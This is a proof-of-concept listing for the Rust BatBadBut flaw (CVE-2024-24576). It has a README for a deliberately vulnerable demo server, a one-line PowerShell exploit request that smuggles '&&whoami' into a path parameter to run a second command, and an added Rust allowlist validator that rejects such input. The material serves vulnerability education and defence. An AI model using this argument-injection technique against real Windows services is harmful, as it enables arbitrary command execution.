CVE-2024-24576 PoC — Rust Security Vulnerability

Source
Associated Vulnerability
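Title: Rust Security Vulnerability (CVE-2024-24576)
Description: Rust is a general-purpose, compiled programming language from the Mozilla Foundation (USA). Rust versions before 1.77.2 contain a security vulnerability that stems from not correctly escaping arguments to batch files on Windows; an attacker can execute arbitrary shell commands by bypassing the escaping.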
Description
This is a simple demo for the BadBatBut vulnerability CVE-2024-24576
Readme
# CVE-2024-24576 BadBatBut Demo

This is a simple demo for the BadBatBut vulnerability CVE-2024-24576.

More information here - https://blog.rust-lang.org/2024/04/09/cve-2024-24576.html.

This repository is for educational purposes only.

## Usage

### Pre-built binary
- Get the pre-built Windows binary from the [releases](https://github.com/corysabol/batbadbut-demo/releases).
- Run the server binary `./badbatbut-demo.exe`

### Build from source
- Clone this repo
- Run the code on a Windows box `cargo run`

### Exploit

The server exposes an endpoint `/server_info/{server}` on `http://localhost:9999` which runs a .bat file to fetch server info.
The vulnerability can be exploited by sending a GET request to this endpoint as follows:

```
Write-Output (Invoke-WebRequest -Uri "http://localhost:9999/server_info/localhost&&whoami").Content
```
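
A defensive counterpart to the request above, as an added example that is not part of the original repository: validate the `{server}` path segment against a strict host-name allowlist before it is passed to the batch file. The names `validate_server` and `server_info` are hypothetical, and the example assumes the parameter is meant to be a DNS host name; `serverinfo.bat` is the batch file shipped with the demo.

```rust
use std::io;
use std::process::{Command, Output};

/// Allowlist check (assumption: the parameter is a DNS host name).
/// Labels may contain only ASCII letters, digits and hyphens, so every
/// character cmd.exe treats specially (&, |, <, >, ^, %, ", whitespace)
/// is rejected without having to enumerate it.
pub fn validate_server(input: &str) -> Result<&str, String> {
    if input.is_empty() || input.len() > 253 {
        return Err("host name length out of range".into());
    }
    for label in input.split('.') {
        let ok = !label.is_empty()
            && label.len() <= 63
            && !label.starts_with('-')
            && !label.ends_with('-')
            && label.bytes().all(|b| b.is_ascii_alphanumeric() || b == b'-');
        if !ok {
            return Err(format!("rejected label {:?}", label));
        }
    }
    Ok(input)
}

/// Hypothetical handler body: the batch file is spawned only after the
/// argument passes validation. Rust 1.77.2 and later add a second layer:
/// `Command` fails with `InvalidInput` at spawn time when it cannot
/// safely escape an argument for a batch file.
pub fn server_info(raw: &str) -> io::Result<Output> {
    let server = validate_server(raw)
        .map_err(|e| io::Error::new(io::ErrorKind::InvalidInput, e))?;
    Command::new("serverinfo.bat").arg(server).output()
}

fn main() {
    // Constructed inputs; the last one is the value from the request above.
    for raw in ["localhost", "db-01.example.internal", "localhost&&whoami"] {
        match validate_server(raw) {
            Ok(s) => println!("accept {s}"),
            Err(e) => println!("reject {raw:?}: {e}"),
        }
    }
}
```

Rejected input never reaches `Command`, so the check holds even on a toolchain older than 1.77.2; upgrading the toolchain is still required.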
File Snapshot

```
[4.0K] /data/pocs/34c27e5190d53d410b0ae9154a376990ea58bbb7
├── [ 35K] Cargo.lock
├── [ 208] Cargo.toml
├── [ 879] README.md
├── [ 90] serverinfo.bat
└── [4.0K] src
    └── [1.4K] main.rs

1 directory, 5 files
```